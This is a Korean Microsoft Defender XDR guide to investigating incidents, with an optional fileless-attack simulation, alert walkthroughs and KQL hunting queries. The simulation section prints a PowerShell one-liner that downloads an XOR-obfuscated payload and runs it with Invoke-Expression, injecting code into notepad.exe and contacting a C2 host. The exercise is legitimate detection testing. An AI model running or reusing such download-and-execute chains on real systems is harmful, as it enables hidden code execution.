다음을 통해 공유

Microsoft Defender XDR을 사용하여 조사 및 응답

  • 아티클

적용 대상:

  • Microsoft Defender XDR

이 문서에서는 공격 시뮬레이션 및 자습서를 사용하여 인시던트 만들기 프로세스를 간략하게 설명하고 Microsoft Defender XDR을 사용하여 조사하고 대응합니다. 이 프로세스를 시작하기 전에 Microsoft Defender XDR을 파일럿 및 배포하기 위한 전체 프로세스를 검토했으며 최소한 Microsoft Defender XDR의 일부 구성 요소를 파일럿했는지 확인합니다.

Microsoft Defender XDR의 인시던트 는 공격의 스토리를 구성하는 상관 관계 경고 및 관련 데이터의 컬렉션입니다. Microsoft 365 서비스 및 앱은 의심스럽거나 악의적인 이벤트 또는 활동을 검색할 때 경고를 만듭니다. 개별 경고는 완료되거나 진행 중인 공격에 대한 중요한 단서를 제공합니다. 그러나 공격은 일반적으로 디바이스, 사용자 및 사서함과 같은 다양한 유형의 엔터티에 대해 다양한 기술을 사용합니다. 결과는 테넌트에서 여러 엔터티에 대한 여러 경고입니다.

참고

보안 분석 및 인시던트 대응을 처음 접 하는 경우 첫 번째 인시던트 연습에 대응 을 참조하여 일반적인 분석, 수정 및 인시던트 후 검토 프로세스를 안내합니다.

Microsoft Defender XDR용 엔드 투 엔드 배포

인시던트 조사 및 대응을 포함하여 Microsoft Defender XDR의 구성 요소를 배포하는 데 도움이 되는 시리즈의 문서 6/6입니다.

파일럿 및 Microsoft Defender XDR 프로세스 배포의 인시던트 조사 및 대응을 보여 주는 다이어그램

파일럿 및 배포 중에 언제든지 시뮬레이션된 공격으로 인시던트를 만들고 Microsoft Defender 포털을 사용하여 조사 및 대응하여 Microsoft Defender XDR의 인시던트 대응 및 자동화된 조사 및 수정 기능을 테스트할 수 있습니다.

Microsoft Defender XDR을 사용한 인시던트 조사 및 대응 워크플로

프로덕션 환경에서 Microsoft Defender XDR을 사용하여 인시던트 조사 및 대응을 위한 워크플로는 다음과 같습니다.

인시던트 조사 및 대응을 수행하는 단계를 보여 주는 다이어그램

업데이트 그림

다음 단계를 따릅니다.

  1. Microsoft Defender 포털을 사용하여 공격 시뮬레이션
  2. 인시던트 우선 순위 지정
  3. 인시던트 관리
  4. 알림 센터를 사용하여 자동화된 조사 및 대응 검토
  5. 고급 헌팅 사용

1단계. Microsoft Defender 포털을 사용하여 공격 시뮬레이션

Microsoft Defender 포털에는 파일럿 환경에서 시뮬레이션된 공격을 만드는 기본 제공 기능이 있습니다.

Office 365용 Defender 공격 시뮬레이션 교육

Microsoft 365 E5 또는 Office 365용 Microsoft Defender 플랜 2를 사용하는 Office 365용 Defender에는 피싱 공격에 대한 공격 시뮬레이션 교육이 포함되어 있습니다. 기본 단계는 다음과 같습니다.

  1. 시뮬레이션 만들기

    새 시뮬레이션을 만들고 시작하는 방법에 대한 단계별 지침은 피싱 공격 시뮬레이션을 참조하세요.

  2. 페이로드 만들기

    시뮬레이션 내에서 사용할 페이로드를 만드는 방법에 대한 단계별 지침은 공격 시뮬레이션 학습을 위한 사용자 지정 페이로드 만들기를 참조하세요.

  3. 인사이트 얻기

    보고를 통해 인사이트를 얻는 방법에 대한 단계별 지침은 공격 시뮬레이션 교육을 통해 인사이트 얻기를 참조하세요.

자세한 내용은 시뮬레이션을 참조하세요.

엔드포인트용 Defender 공격 자습서 & 시뮬레이션

Microsoft의 엔드포인트용 Defender 시뮬레이션은 다음과 같습니다.

  • 문서 삭제 백도어
  • 자동 조사(백도어)

타사 원본의 추가 시뮬레이션이 있습니다. 자습서 집합도 있습니다.

각 시뮬레이션 또는 자습서에 대해 다음을 수행합니다.

  1. 제공된 해당 연습 문서를 다운로드하고 읽습니다.

  2. 시뮬레이션 파일을 다운로드합니다. 테스트 디바이스에서 파일 또는 스크립트를 다운로드하도록 선택할 수 있지만 필수는 아닙니다.

  3. 연습 문서에 설명된 대로 테스트 디바이스에서 시뮬레이션 파일 또는 스크립트를 실행합니다.

자세한 내용은 시뮬레이션된 공격을 통해 엔드포인트용 Microsoft Defender 환경을 참조하세요.

격리된 도메인 컨트롤러 및 클라이언트 디바이스를 사용하여 공격 시뮬레이션(선택 사항)

이 선택적 인시던트 대응 연습에서는 PowerShell 스크립트를 사용하여 격리된 AD DS(Active Directory Domain Services) 도메인 컨트롤러 및 Windows 디바이스에 대한 공격을 시뮬레이션한 다음 인시던트를 조사, 수정 및 해결합니다.

먼저 파일럿 환경에 엔드포인트를 추가해야 합니다.

파일럿 환경 엔드포인트 추가

먼저 격리된 AD DS 도메인 컨트롤러와 Windows 디바이스를 파일럿 환경에 추가해야 합니다.

  1. 파일럿 환경 테넌트가 Microsoft Defender XDR을 사용하도록 설정했는지 확인합니다.

  2. 도메인 컨트롤러가 다음을 수행했는지 확인합니다.

  3. 테스트 디바이스가 다음과 같은지 확인합니다.

테넌트 및 디바이스 그룹을 사용하는 경우 테스트 디바이스에 대한 전용 디바이스 그룹을 만들고 최상위 수준으로 푸시합니다.

한 가지 대안은 AD DS 도메인 컨트롤러를 호스트하고 Microsoft Azure 인프라 서비스에서 디바이스를 가상 머신으로 테스트하는 것입니다. 시뮬레이션된 엔터프라이즈 테스트 랩 가이드의 1단계에서 지침을 사용할 수 있지만 APP1 가상 머신 만들기는 건너뛸 수 있습니다.

결과는 다음과 같습니다.

시뮬레이션된 엔터프라이즈 테스트 랩 가이드를 사용하는 평가 환경의 다이어그램입니다.

고급 기술을 활용하여 검색에서 숨기는 정교한 공격을 시뮬레이션합니다. 이 공격은 도메인 컨트롤러에서 열린 SMB(서버 메시지 블록) 세션을 열거하고 사용자 디바이스의 최근 IP 주소를 검색합니다. 이 공격 범주는 일반적으로 피해자의 장치에 삭제된 파일을 포함하지 않으며 메모리에서만 발생합니다. 그들은 기존 시스템 및 관리 도구를 사용하여 "땅에서 생활"하고 실행을 숨기기 위해 시스템 프로세스에 코드를 주입합니다. 이러한 동작을 통해 탐지를 회피하고 디바이스에서 유지할 수 있습니다.

이 시뮬레이션에서 샘플 시나리오는 PowerShell 스크립트로 시작합니다. 실제 환경에서는 사용자가 스크립트를 실행하도록 속거나 스크립트가 이전에 감염된 디바이스에서 다른 컴퓨터로 원격 연결에서 실행될 수 있습니다. 이는 공격자가 네트워크에서 횡적으로 이동하려고 했음을 나타냅니다. 관리자는 또한 스크립트를 원격으로 실행하여 다양한 관리 작업을 수행하기 때문에 이러한 스크립트를 검색하기가 어려울 수 있습니다.

프로세스 주입 및 SMB 정찰 공격이 있는 파일리스 PowerShell 공격의 스크린샷

시뮬레이션 중에 공격은 셸코드를 무고해 보이는 프로세스에 주입합니다. 이 시나리오에서는 notepad.exe 사용해야 합니다. 시뮬레이션을 위해 이 프로세스를 선택했지만 공격자는 svchost.exe 같은 장기 실행 시스템 프로세스를 대상으로 할 가능성이 더 큽니다. 그런 다음 셸코드는 공격자의 C2(명령 및 제어) 서버에 연결하여 진행 방법에 대한 지침을 받습니다. 스크립트는 DC(도메인 컨트롤러)에 대한 정찰 쿼리를 실행하려고 시도합니다. 정찰을 사용하면 공격자가 최근 사용자 로그인 정보에 대한 정보를 가져올 수 있습니다. 공격자가 이 정보를 가지고 나면 네트워크에서 횡적으로 이동하여 특정 중요한 계정으로 이동할 수 있습니다.

중요

최적의 결과를 보려면 공격 시뮬레이션 지침을 최대한 면밀히 따르세요.

격리된 AD DS 도메인 컨트롤러 공격 시뮬레이션 실행

공격 시나리오 시뮬레이션을 실행하려면 다음을 수행합니다.

  1. 파일럿 환경에 격리된 AD DS 도메인 컨트롤러 및 Windows 디바이스가 포함되어 있는지 확인합니다.

  2. 테스트 사용자 계정으로 테스트 디바이스에 로그인합니다.

  3. 테스트 디바이스에서 Windows PowerShell 창을 엽니다.

  4. 다음 시뮬레이션 스크립트를 복사합니다.

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
$base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
$decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
$i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))

    참고

    웹 브라우저에서 이 문서를 열면 특정 문자를 손실하거나 추가 줄 바꿈을 도입하지 않고 전체 텍스트를 복사하는 데 문제가 발생할 수 있습니다. 이 경우 이 문서를 다운로드하여 Adobe Reader에서 엽니다.

  5. 복사한 스크립트를 PowerShell 창에 붙여넣고 실행합니다.

참고

RDP(원격 데스크톱 프로토콜)를 사용하여 PowerShell을 실행하는 경우 CTRL-V 핫키 또는 마우스 오른쪽 클릭 붙여넣기 메서드가 작동하지 않을 수 있으므로 RDP 클라이언트에서 클립보드 텍스트 입력 명령을 사용합니다. PowerShell의 최신 버전도 해당 메서드를 허용하지 않는 경우가 있습니다. 먼저 메모리의 메모장에 복사하여 가상 머신에 복사한 다음 PowerShell에 붙여넣어야 할 수 있습니다.

몇 초 후에 메모장 앱이 열립니다. 시뮬레이션된 공격 코드가 메모장에 삽입됩니다. 자동으로 생성된 메모장 인스턴스를 열어 두어 전체 시나리오를 경험할 수 있습니다.

시뮬레이션된 공격 코드는 외부 IP 주소(C2 서버 시뮬레이션)와 통신한 다음 SMB를 통해 도메인 컨트롤러에 대한 정찰을 시도합니다.

이 스크립트가 완료되면 PowerShell 콘솔에 이 메시지가 표시됩니다.

ran NetSessionEnum against [DC Name] with return code result 0

자동화된 인시던트 및 대응 기능이 작동하는 것을 확인하려면 notepad.exe 프로세스를 열어 두세요. 자동화된 인시던트 및 응답이 메모장 프로세스를 중지하는 것을 볼 수 있습니다.

시뮬레이션된 공격에 대한 인시던트 조사

참고

이 시뮬레이션을 진행하기 전에 다음 비디오를 시청하여 인시던트 관리가 조사 프로세스의 일부로 관련 경고를 함께 조각하는 방법, 포털에서 찾을 수 있는 위치 및 보안 작업에 도움이 되는 방법을 확인합니다.

SOC 분석가의 관점으로 전환하면 이제 Microsoft Defender 포털에서 공격을 조사할 수 있습니다.

  1. Microsoft Defender 포털을 엽니다.

  2. 탐색 창에서 인시던트 & 경고 인시던트 >를 선택합니다.

  3. 시뮬레이션된 공격에 대한 새 인시던트가 인시던트 큐에 표시됩니다.

    인시던트 큐의 예제 스크린샷.

단일 인시던트로 공격 조사

Microsoft Defender XDR은 분석을 상호 연결하고 다양한 제품의 모든 관련 경고 및 조사를 하나의 인시던트 엔터티로 집계합니다. 이렇게 하면 Microsoft Defender XDR은 SOC 분석가가 복잡한 위협을 이해하고 대응할 수 있도록 더 광범위한 공격 스토리를 보여 줍니다.

이 시뮬레이션 중에 생성된 경고는 동일한 위협과 연결되며 결과적으로 단일 인시던트로 자동으로 집계됩니다.

인시던트 보기:

  1. Microsoft Defender 포털을 엽니다.

  2. 탐색 창에서 인시던트 & 경고 인시던트 >를 선택합니다.

  3. 인시던트 이름 왼쪽에 있는 원을 클릭하여 최신 항목을 선택합니다. 측면 패널에는 모든 관련 경고를 포함하여 인시던트에 대한 추가 정보가 표시됩니다. 각 인시던트에는 포함된 경고의 특성에 따라 설명하는 고유한 이름이 있습니다.

    대시보드에 표시되는 경고는 Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, 엔드포인트용 Microsoft Defender, Microsoft Defender XDR 및 Office 365용 Microsoft Defender와 같은 서비스 리소스에 따라 필터링할 수 있습니다.

  4. 인시던트 열기 페이지를 선택하여 인시던트에 대한 자세한 정보를 가져옵니다.

    인시던트 페이지에서 인시던트와 관련된 모든 경고 및 정보를 볼 수 있습니다. 이 정보에는 경고에 관련된 엔터티 및 자산, 경고의 검색 원본(예: Microsoft Defender for Identity 또는 엔드포인트용 Microsoft Defender) 및 함께 연결된 이유가 포함됩니다. 인시던트 경고 목록을 검토하면 공격의 진행률이 표시됩니다. 이 보기에서 개별 경고를 보고 조사할 수 있습니다.

    오른쪽 메뉴에서 인시던트 관리를 클릭하여 인시던트에 태그를 지정하고, 자신에게 할당하고, 메모를 추가할 수도 있습니다.

생성된 경고 검토

시뮬레이션된 공격 중에 생성된 경고 중 일부를 살펴보겠습니다.

참고

시뮬레이션된 공격 중에 생성된 몇 가지 경고만 살펴보겠습니다. 테스트 디바이스에서 실행되는 Windows 및 Microsoft Defender XDR 제품의 버전에 따라 약간 다른 순서로 표시되는 더 많은 경고가 표시될 수 있습니다.

생성된 경고의 예제 스크린샷.

경고: 의심스러운 프로세스 삽입 관찰됨(원본: 엔드포인트용 Microsoft Defender)

고급 공격자는 정교하고 은밀한 방법을 사용하여 메모리를 유지하며 검색 도구에서 숨깁니다. 한 가지 일반적인 기술은 악의적인 실행 파일이 아닌 신뢰할 수 있는 시스템 프로세스 내에서 작동하여 검색 도구 및 보안 작업이 악성 코드를 발견하기 어렵게 만드는 것입니다.

SOC 분석가가 이러한 고급 공격을 포착할 수 있도록 엔드포인트용 Microsoft Defender의 심층 메모리 센서는 클라우드 서비스에 다양한 프로세스 간 코드 주입 기술에 대한 전례 없는 가시성을 제공합니다. 다음 그림에서는 엔드포인트용 Defender가 notepad.exe코드를 삽입하려고 시도했을 때 검색하고 경고하는 방법을 보여줍니다.

잠재적으로 악의적인 코드를 삽입하기 위한 경고 예제의 스크린샷.

경고: 명령줄 인수 없이 프로세스 실행에서 관찰되는 예기치 않은 동작(원본: 엔드포인트용 Microsoft Defender)

엔드포인트용 Microsoft Defender 검색은 공격 기술의 가장 일반적인 특성을 대상으로 하는 경우가 많습니다. 이 메서드는 내구성을 보장하고 공격자가 최신 전술로 전환할 수 있는 기준을 높입니다.

Microsoft는 대규모 학습 알고리즘을 사용하여 조직 및 전 세계에서 일반적인 프로세스의 정상적인 동작을 설정하고 이러한 프로세스가 비정상적인 동작을 표시하는 경우를 감시합니다. 이러한 비정상적인 동작은 종종 불필요한 코드가 도입되었고 신뢰할 수 없는 프로세스에서 실행되고 있음을 나타냅니다.

이 시나리오의 경우 notepad.exe 프로세스는 외부 위치와의 통신과 관련된 비정상적인 동작을 나타냅니다. 이 결과는 악성 코드를 도입하고 실행하는 데 사용되는 특정 방법과는 독립적입니다.

참고

이 경고는 추가 백 엔드 처리가 필요한 기계 학습 모델을 기반으로 하기 때문에 포털에서 이 경고가 표시되기까지 다소 시간이 걸릴 수 있습니다.

경고 세부 정보에는 조사를 확장하기 위해 피벗으로 사용할 수 있는 표시기인 외부 IP 주소가 포함됩니다.

경고 프로세스 트리에서 IP 주소를 선택하여 IP 주소 세부 정보 페이지를 봅니다.

명령줄 인수가 없는 프로세스 실행의 예기치 않은 동작에 대한 예제 스크린샷

다음 그림에서는 선택한 IP 주소 세부 정보 페이지(경고 프로세스 트리에서 IP 주소를 클릭)를 표시합니다.

IP 주소 세부 정보 페이지의 예제 스크린샷

경고: 사용자 및 IP 주소 정찰(SMB)(원본: Microsoft Defender for Identity)

SMB(서버 메시지 블록) 프로토콜을 사용하여 열거하면 공격자가 네트워크를 통해 횡적으로 이동하여 특정 중요한 계정에 액세스하는 데 도움이 되는 최신 사용자 로그온 정보를 가져올 수 있습니다.

이 검색에서 SMB 세션 열거형이 도메인 컨트롤러에 대해 실행될 때 경고가 트리거됩니다.

사용자 및 IP 주소 정찰에 대한 Microsoft Defender for Identity 경고의 예 스크린샷

엔드포인트용 Microsoft Defender를 사용하여 디바이스 타임라인 검토

이 인시던트에서 다양한 경고를 탐색한 후 이전에 조사한 인시던트 페이지로 다시 이동합니다. 인시 트 페이지에서 디바이스 탭을 선택하여 엔드포인트용 Microsoft Defender 및 Microsoft Defender for Identity에서 보고한 이 인시던트와 관련된 디바이스를 검토합니다.

공격이 수행된 디바이스의 이름을 선택하여 해당 특정 디바이스에 대한 엔터티 페이지를 엽니다. 해당 페이지에서 트리거된 경고 및 관련 이벤트를 볼 수 있습니다.

시간 표시 막대 탭을 선택하여 디바이스 타임라인을 열고 디바이스에서 관찰된 모든 이벤트 및 동작을 시간순으로 보고, 발생한 경고와 함께 산재합니다.

동작이 있는 디바이스 타임라인의 예제 스크린샷.

더 흥미로운 동작 중 일부를 확장하면 프로세스 트리와 같은 유용한 세부 정보가 제공됩니다.

예를 들어 경고 이벤트 의심스러운 프로세스 주입이 관찰될 때까지 아래로 스크롤합니다. 아래의 notepad.exe 프로세스 이벤트에 삽입된powershell.exe 선택하여 측면 창의 이벤트 엔터티 그래프 아래에 이 동작에 대한 전체 프로세스 트리를 표시합니다. 필요한 경우 검색 창을 사용하여 필터링합니다.

선택한 PowerShell 파일 만들기 동작에 대한 프로세스 트리 예제의 스크린샷.

Microsoft Defender for Cloud Apps를 사용하여 사용자 정보 검토

인시던트 페이지에서 사용자 탭을 선택하여 공격에 관련된 사용자 목록을 표시합니다. 테이블에는 각 사용자의 조사 우선 순위 점수를 포함하여 각 사용자에 대한 추가 정보가 포함되어 있습니다.

사용자 이름을 선택하여 추가 조사를 수행할 수 있는 사용자의 프로필 페이지를 엽니다. 위험한 사용자 조사에 대해 자세히 알아보세요.

Defender for Cloud Apps 사용자 페이지의 예제 스크린샷.

자동화된 조사 및 수정

참고

이 시뮬레이션을 진행하기 전에 다음 비디오를 시청하여 자동화된 자가 복구가 무엇인지, 포털에서 찾을 수 있는 위치 및 보안 작업에 어떻게 도움이 되는지 알아봅니다.

Microsoft Defender 포털에서 인시던트로 다시 이동합니다. 인시던트 페이지의 조사 탭에는 Microsoft Defender for Identity 및 엔드포인트용 Microsoft Defender에 의해 트리거된 자동화된 조사가 표시됩니다. 아래 스크린샷은 엔드포인트용 Defender에서 트리거한 자동화된 조사만 표시합니다. 기본적으로 엔드포인트용 Defender는 큐에 있는 아티팩트를 자동으로 수정하므로 수정이 필요합니다.

인시던트 관련 자동화된 조사의 예제 스크린샷.

조사를 트리거한 경고를 선택하여 조사 세부 정보 페이지를 엽니다. 다음 세부 정보가 표시됩니다.

  • 자동화된 조사를 트리거한 경고입니다.
  • 영향을 받은 사용자 및 디바이스. 추가 디바이스에서 표시기가 발견되면 이러한 추가 디바이스도 나열됩니다.
  • 증거 목록입니다. 파일, 프로세스, 서비스, 드라이버 및 네트워크 주소와 같은 엔터티를 찾아 분석합니다. 이러한 엔터티는 경고와 가능한 관계를 분석하고 무해하거나 악의적인 것으로 평가됩니다.
  • 위협이 발견되었습니다. 조사 중에 발견된 알려진 위협입니다.

참고

타이밍에 따라 자동화된 조사가 계속 실행 중일 수 있습니다. 증거를 수집하고 분석하고 결과를 검토하기 전에 프로세스가 완료되기까지 몇 분 정도 기다립니다. 조사 세부 정보 페이지를 새로 고쳐 최신 결과를 가져옵니다.

조사 세부 정보 페이지의 예제 스크린샷.

자동화된 조사 중에 엔드포인트용 Microsoft Defender는 수정이 필요한 아티팩트 중 하나로 삽입된 notepad.exe 프로세스를 확인했습니다. 엔드포인트용 Defender는 자동화된 수정의 일부로 의심스러운 프로세스 주입을 자동으로 중지합니다.

테스트 디바이스의 실행 중인 프로세스 목록에서 notepad.exe 사라지는 것을 볼 수 있습니다.

인시던트 해결

조사가 완료되고 수정이 확인되면 인시던트를 해결합니다.

인시던트 페이지에서 인시던트관리를 선택합니다. 상태를 인시던트 해결로 설정하고, 결정에 대한 분류 및 보안 테스트에 대한 True 경고를 선택합니다.

스위치를 클릭하여 인시던트를 해결할 수 있는 인시던트 관리 패널이 열려 있는 인시던트 페이지의 예제 스크린샷

인시던트가 해결되면 Microsoft Defender 포털 및 관련 포털에서 연결된 모든 경고를 해결합니다.

인시던트 분석, 자동화된 조사 및 인시던트 해결을 위한 공격 시뮬레이션을 마무리합니다.

2단계. 인시던트 우선 순위 지정

Microsoft Defender 포털의 빠른 시작 시 인시던트 & 경고 > 인시던트에서 인시던트 큐로 이동합니다. 다음은 예입니다.

Microsoft Defender 포털의 인시던트 & 경고 섹션 스크린샷

가장 최근의 인시던트 및 경고 섹션에는 수신된 경고 수와 지난 24시간 동안 생성된 인시던트 수의 그래프가 표시됩니다.

인시던트 목록을 검토하고 할당 및 조사에 대한 중요도의 우선 순위를 지정하려면 다음을 수행할 수 있습니다.

  • 인시던트 또는 영향을 받은 엔터티의 다양한 특성을 파악할 수 있도록 사용자 지정 가능한 열 구성( 열 선택 선택). 이렇게 하면 분석을 위한 인시던트 우선 순위 지정과 관련하여 정보에 입각한 결정을 내릴 수 있습니다.

  • 필터링을 사용하여 특정 시나리오 또는 위협에 집중합니다. 인시던트 큐에 필터를 적용하면 즉각적인 주의가 필요한 인시던트 확인에 도움이 될 수 있습니다.

기본 인시던트 큐에서 필터를 선택하여 특정 인시던트 집합을 지정할 수 있는 필터 창을 확인합니다. 다음은 예입니다.

Microsoft Defender 포털의 인시던트 & 경고 섹션의 필터 창 스크린샷

자세한 내용은 인시던트 우선 순위를 참조하세요.

3단계. 인시던트 관리

인시던트에 대한 인시던트 관리 창에서 인시던트를 관리할 수 있습니다. 다음은 예입니다.

Microsoft Defender 포털의 인시던트 & 경고 섹션의 인시던트 관리 창 스크린샷

다음의 인시던트 관리 링크에서 이 창을 표시할 수 있습니다.

  • 인시던트 큐의 인시던트 속성 창입니다.
  • 인시던트 요약 페이지입니다.

인시던트 관리 방법은 다음과 같습니다.

  • 인시던트 이름 편집

    보안 팀 모범 사례에 따라 자동으로 할당된 이름을 변경합니다.

  • 인시던트 태그 추가

    보안 팀이 인시던트 분류에 사용하는 태그를 추가합니다. 이 태그는 나중에 필터링할 수 있습니다.

  • 인시던트 할당

    나중에 필터링할 수 있는 사용자 계정 이름에 할당합니다.

  • 인시던트 해결

    수정된 후 인시던트를 닫습니다.

  • 분류 및 결정 설정

    인시던트를 해결할 때 위협 유형을 분류하고 선택합니다.

  • 메모 추가

    보안 팀 모범 사례에 따라 진행률, 메모 또는 기타 정보에 대한 설명을 사용합니다. 전체 주석 기록은 인시던트 세부 정보 페이지의 메모 및 기록 옵션에서 사용할 수 있습니다.

자세한 내용은 인시던트 관리를 참조하세요.

4단계. 알림 센터를 사용하여 자동화된 조사 및 대응 검토

수정 작업은 조직에서 자동 조사 및 응답 기능을 구성한 방식에 따라 자동으로 수행되거나 보안 운영 팀의 승인에 따라 수행됩니다. 보류 중이든 완료되었는지 여부에 관계없이 모든 작업은 알림 센터에 나열되며, 여기에는 디바이스에 대한 보류 중 및 완료된 수정 작업, 전자 메일 & 공동 작업 콘텐츠 및 ID가 한 위치에 나열됩니다.

다음은 예입니다.

Microsoft Defender 포털의 통합 알림 센터 스크린샷.

알림 센터에서 보류 중인 작업을 선택한 다음 플라이아웃 창에서 승인하거나 거부할 수 있습니다. 다음은 예입니다.

Microsoft Defender 포털에서 작업을 승인하거나 거부하는 옵션을 표시하는 창의 스크린샷.

자동화된 조사를 적시에 진행하고 완료할 수 있도록 가능한 한 빨리 보류 중인 작업을 승인(또는 거부)합니다.

자세한 내용은 자동 조사 및 대응 및알림 센터를 참조하세요.

5단계. 고급 헌팅 사용

참고

고급 헌팅 시뮬레이션을 진행하기 전에 다음 비디오를 시청하여 고급 헌팅 개념을 이해하고, 포털에서 찾을 수 있는 위치를 확인하고, 보안 작업에 어떻게 도움이 되는지 알아보세요.


선택적 파일리스 PowerShell 공격 시뮬레이션이 이미 자격 증명 액세스 단계에 도달한 실제 공격인 경우 조사 시점에 고급 헌팅을 사용하여 생성된 경고 및 영향을 받는 엔터티에서 이미 알고 있는 내용을 사용하여 네트워크의 이벤트 및 레코드를 사전에 검색할 수 있습니다.

예를 들어 사용자 및 IP 주소 정찰(SMB) 경고의 정보를 기반으로 테이블을 사용하여 IdentityDirectoryEvents 모든 SMB 세션 열거 이벤트를 찾거나 테이블을 사용하여 IdentityQueryEvents Microsoft Defender for Identity 데이터의 다양한 다른 프로토콜에서 더 많은 검색 활동을 찾을 수 있습니다.

헌팅 환경 요구 사항

이 시뮬레이션에 필요한 단일 내부 사서함 및 디바이스가 있습니다. 테스트 메시지를 보내려면 외부 전자 메일 계정도 필요합니다.

  1. 테넌트가 Microsoft Defender XDR을 사용하도록 설정했는지 확인합니다.

  2. 전자 메일을 받는 데 사용할 대상 사서함을 식별합니다.

    • 이 사서함은 Office 365용 Microsoft Defender에서 모니터링해야 합니다.

    • 요구 사항 3의 디바이스가 이 사서함에 액세스해야 합니다.

  3. 테스트 디바이스 구성:

    a. Windows 10 버전 1903 이상 버전을 사용하고 있는지 확인합니다.

    b. 테스트 디바이스를 테스트 도메인에 조인합니다.

    c. Microsoft Defender 바이러스 백신을 켭니다. Microsoft Defender 바이러스 백신을 사용하도록 설정하는 데 문제가 있는 경우 이 문제 해결 항목을 참조하세요.

    d. 엔드포인트용 Microsoft Defender에 온보딩합니다.

시뮬레이션 실행

  1. 외부 전자 메일 계정에서 헌팅 환경 요구 사항 섹션의 2단계에서 식별된 사서함으로 전자 메일을 보냅니다. 기존 전자 메일 필터 정책을 통해 허용되는 첨부 파일을 포함합니다. 이 파일은 악의적이거나 실행 파일일 필요가 없습니다. 제안된 파일 형식은 .pdf, .exe (허용되는 경우) 또는 Word 파일과 같은 Office 문서 형식입니다.

  2. 헌팅 환경 요구 사항 섹션의 3단계에 정의된 대로 구성된 디바이스에서 보낸 전자 메일을 엽니다. 첨부 파일을 열거나 디바이스에 파일을 저장합니다.

헌팅 이동

  1. Microsoft Defender 포털을 엽니다.

  2. 탐색 창에서 헌팅 고급 헌팅 > 을 선택합니다.

  3. 전자 메일 이벤트를 수집하여 시작하는 쿼리를 빌드합니다.

    1. 새로 쿼리 > 를 선택합니다.

    2. 고급 헌팅 아래의 이메일 그룹에서 EmailEvents를 두 번 클릭합니다. 쿼리 창에 이 항목이 표시됩니다.

      EmailEvents

    3. 쿼리의 시간 프레임을 지난 24시간으로 변경합니다. 위의 시뮬레이션을 실행할 때 보낸 전자 메일이 지난 24시간 동안이었다고 가정하면 필요에 따라 시간 프레임을 변경합니다.

    4. 쿼리 실행을 선택합니다. 파일럿 환경에 따라 결과가 다를 수 있습니다.

      참고

      데이터 반환을 제한하는 필터링 옵션은 다음 단계를 참조하세요.

      Microsoft Defender 포털의 고급 헌팅 페이지 스크린샷

      참고

      고급 헌팅은 쿼리 결과를 테이블 형식 데이터로 표시합니다. 차트와 같은 다른 형식 형식으로 데이터를 보도록 선택할 수도 있습니다.

    5. 결과를 확인하고 연 전자 메일을 식별할 수 있는지 확인합니다. 메시지가 고급 헌팅에 표시되는 데 최대 2시간이 걸릴 수 있습니다. 결과의 범위를 좁히려면 쿼리에 where 조건을 추가하여 "yahoo.com"이 있는 전자 메일만 SenderMailFromDomain으로 찾을 수 있습니다. 다음은 예입니다.

      EmailEvents
| where SenderMailFromDomain == "yahoo.com"

    6. 레코드를 검사할 수 있도록 쿼리에서 결과 행을 클릭합니다.

      Microsoft Defender 포털의 고급 헌팅 페이지의 레코드 검사 섹션 스크린샷

  4. 전자 메일을 볼 수 있는지 확인했으므로 첨부 파일에 대한 필터를 추가합니다. 환경에서 첨부 파일이 있는 모든 전자 메일에 집중합니다. 이 시뮬레이션의 경우 사용자 환경에서 전송되는 전자 메일이 아닌 인바운드 전자 메일에 집중합니다. 메시지를 찾고 "| 추가하기 위해 추가한 필터를 제거합니다. where AttachmentCount > 0EmailDirection == "Inbound""

    다음 쿼리는 모든 전자 메일 이벤트에 대한 초기 쿼리보다 짧은 목록으로 결과를 보여 줍니다.

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"

  5. 다음으로, 결과 집합에 첨부 파일에 대한 정보(예: 파일 이름, 해시)를 포함합니다. 이렇게 하려면 EmailAttachmentInfo 테이블을 조인합니다. 조인에 사용할 일반적인 필드는 NetworkMessageIdRecipientObjectId입니다.

    다음 쿼리에는 추가 줄 "| project-rename EmailTimestamp=Timestamp"는 다음 단계에서 추가할 파일 작업과 관련된 타임스탬프와 전자 메일과 관련된 타임스탬프를 식별하는 데 도움이 됩니다.

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId

  6. 다음으로 EmailAttachmentInfo 테이블의 SHA256 값을 사용하여 해당 해시에 대한 DeviceFileEvents(엔드포인트에서 발생한 파일 작업)를 찾습니다. 여기서 일반적인 필드는 첨부 파일에 대한 SHA256 해시입니다.

    결과 테이블에는 이제 디바이스 이름, 수행된 작업(이 경우 FileCreated 이벤트만 포함하도록 필터링됨) 및 파일이 저장된 위치와 같은 엔드포인트(엔드포인트용 Microsoft Defender)의 세부 정보가 포함됩니다. 프로세스와 연결된 계정 이름도 포함됩니다.

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
| join DeviceFileEvents on SHA256
| where ActionType == "FileCreated"

    이제 사용자가 첨부 파일을 열거나 저장한 모든 인바운드 이메일을 식별하는 쿼리를 만들었습니다. 이 쿼리를 구체화하여 특정 보낸 사람 도메인, 파일 크기, 파일 형식 등을 필터링할 수도 있습니다.

  7. 함수는 해당 보급, 서명자 및 발급자 정보 등과 같은 파일에 대한 더 많은 TI 데이터를 끌어올 수 있는 특별한 종류의 조인입니다. 파일에 대한 자세한 내용을 보려면 FileProfile() 함수 보강을 사용합니다.

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
| join DeviceFileEvents on SHA256
| where ActionType == "FileCreated"
| distinct SHA1
| invoke FileProfile()

검색 만들기

